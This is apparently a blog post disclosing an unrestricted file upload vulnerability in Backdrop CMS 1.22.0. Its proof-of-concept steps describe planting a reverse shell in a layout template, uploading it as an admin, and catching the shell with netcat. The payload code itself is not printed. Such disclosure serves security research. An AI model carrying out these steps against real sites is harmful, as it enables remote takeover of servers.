Backdrop CMS 1.22.0 — Unrestricted File Upload (Layouts)

3 min readSep 28, 2022

--

Description

# An Issue is discovered in Backdrop CMS 1.22.0

#We found a vulnerability file upload when we upload the malicious file as a layout on the Install New layout page.

Proof of Concept

First, we log in to the target application with admin privileges.

Then select Structure > Layouts > Install new layouts

And then, we click Manual Installation.

We can upload with zip files.

We can find layout files at the link following.

https://backdropcms.org/modules

We download Harris Flexible layout.

Next, We unzip harris_flexible.zip

We proceed to the harris_flexible directory we unzip.

We generate PowerShell reverse shell payload from https://www.revshells.com/

We replace the content of layout — harris-flexible.tpl.php with a reverse shell payload.

After that, we zip harris_flexible directory.

We using nc to listen on port 443

back to the Manual installation popup and upload harris_flexible.zip

Next, we click the INSTALL button.

Finally, we get a shell connection.

Author

Grim The Ripper Team by SOSECURE Thailand

Web Vulnerabilities

Unrestricted File Upload

Php Reverse Shell

Written by GrimTheRipper

You get the best out of others when you give the best of yourself

No responses yet

Help
Status
About
Careers
Press
Blog
Privacy
Terms
Text to speech
Teams